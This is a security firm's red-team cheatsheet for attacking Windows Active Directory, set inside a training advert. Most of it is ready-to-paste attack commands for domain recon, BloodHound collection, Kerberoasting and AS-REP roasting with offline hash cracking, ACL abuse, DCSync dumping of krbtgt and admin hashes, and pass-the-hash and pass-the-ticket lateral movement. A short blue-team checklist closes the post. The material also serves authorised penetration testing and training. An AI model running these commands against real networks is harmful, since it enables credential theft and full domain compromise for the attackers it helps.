Macksofy Technologies
Red team reference

Windows Active Directory Attack Cheatsheet — 2026 Edition

A pen-tester's command-line cheatsheet for attacking Active Directory in 2026. Recon, Kerberoasting, AS-REP, ACL abuse, DCSync, and detection-evasion notes.

Active Directory Red Team Cheatsheet Kerberos
Macksofy Red Team· Offensive operations15 April 2026 16 min read
DC · krbtgtFILESQLWEBEX!corp.localuser → DA in 47h
AD

Active Directory remains the centre of gravity for every Windows enterprise in 2026. Almost every red-team engagement that breaks past the perimeter ends in Domain Admin via the same handful of techniques. This is the cheatsheet our consultants reach for during BFSI and government engagements — copy-paste-ready, with the why next to the what.

Phishinginitial accessWorkstationdomain userBloodHoundmap pathsKerberoastcrack offlineTier-1 Adminlateral moveDomain AdminDCSyncpathcreds
The AD compromise path most engagements actually follow

Recon — what's in the domain

PowerView basics
powershell
Get-NetDomain
Get-NetDomainController
Get-NetUser -SPN
Get-NetGroup "Domain Admins" -FullData
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetComputer -OperatingSystem "*Server 2012*"
Get-NetSession -ComputerName <DC>
Find-LocalAdminAccess
From a Linux foothold (impacket)
bash
# Discover DCs
nmap -p 88,389,445,636 -sV <subnet>

# Enumerate users via SAMR
impacket-samrdump <user>:<pass>@<DC>

# Anonymous enumeration where allowed
impacket-lookupsid anonymous@<DC>

# Get domain SID + trusts
ldapsearch -x -H ldap://<DC> -b "DC=corp,DC=local" "(objectClass=trustedDomain)"

BloodHound — find the path

Collection
bash
# From Windows
SharpHound.exe -c All --zipfilename loot.zip

# From Linux
bloodhound-python -u <user> -p <pass> -d corp.local -ns <DC> -c All
  • Shortest paths to Domain Admins
  • Kerberoastable users with high-privilege paths
  • Computers where Domain Users have local admin
  • ACL chains: GenericAll / WriteDACL / WriteOwner abuse
  • GPO abuse paths via WriteProperty on linked GPOs

Kerberoasting

Service accounts with SPNs let any authenticated user request a TGS encrypted with the service account's NTLM hash, which is then crackable offline. Still by far the highest hit-rate finding in BFSI engagements.

Kerberoast and crack
bash
# Request tickets
impacket-GetUserSPNs corp.local/<user>:<pass> -dc-ip <DC> -request -outputfile spns.txt

# Crack
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt --force

AS-REP roasting

AS-REP roast and crack
bash
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip <DC> -no-pass -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

ACL abuse

ACEEffectTool
GenericAllFull control of objectPowerView, Set-DomainObject
GenericWriteWrite any property (e.g. SPN, logon script)Set-DomainObject
WriteDACLModify object's ACL → grant self GenericAllPowerView
WriteOwnerTake ownership → grant ACLPowerView
WriteProperty (msDS-AllowedToActOnBehalfOfOtherIdentity)RBCD relayRubeus + Rbcd
AllExtendedRightsForce password reset on userSet-DomainUserPassword

Common abusable ACEs and what they grant

DCSync — the keys to the kingdom

DCSync krbtgt + Domain Admin
bash
impacket-secretsdump -just-dc-user krbtgt corp.local/<admin>:<pass>@<DC>
impacket-secretsdump -just-dc-user Administrator corp.local/<admin>:<pass>@<DC>

Lateral movement quick reference

Pass-the-hash, pass-the-ticket, WMI, WinRM
bash
# PtH
impacket-psexec corp.local/<user>@<host> -hashes :<NTLM>

# PtT (after Rubeus dump or impacket-getTGT)
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass <host>.corp.local

# WMI
impacket-wmiexec corp.local/<user>:<pass>@<host>

# WinRM
evil-winrm -i <host> -u <user> -p <pass>

Defensive checklist (for the blue team reading this)

  • Disable RC4 etypes on all KDCs
  • Move every service account to gMSA where possible
  • LAPS for all local admin passwords
  • Tier 0 / 1 / 2 admin separation with PAW workstations
  • Alert on TGT renewal anomalies, RC4 TGS requests, lsass handle access
  • Monthly Bloodhound runs from your own DC to catch ACL drift
Train with Macksofy

Our OSCP-aligned AD bootcamp is one of several hands-on tracks Macksofy delivers across India and the UAE. CERT-In empanelled, OffSec/EC-Council authorized, with weekend cohorts and corporate batches.

View training catalog
FAQ

Quick answers.

It covers about 70% of the OSCP AD chain primitives. The remaining 30% is environment-specific tradecraft you build by repping the OffSec PG Practice and HTB ProLabs.
Talk to us

Get a fixed-price proposal in 48 hours.

Tell us about your security need — pentest, audit, training or a wider engagement. A senior consultant will reply within a few business hours.

CERT-In Empanelled
Information Security Auditor · India
  • CERT-In Empanelled
  • EC-Council ATC · CompTIA Authorized
  • 20,000+ professionals trained
  • India + UAE engagements
Human verification· Cloudflare Turnstile

By submitting this form you agree to be contacted by Macksofy. We typically respond within a few business hours and never share your details. Protected by Cloudflare Turnstile and rate limiting.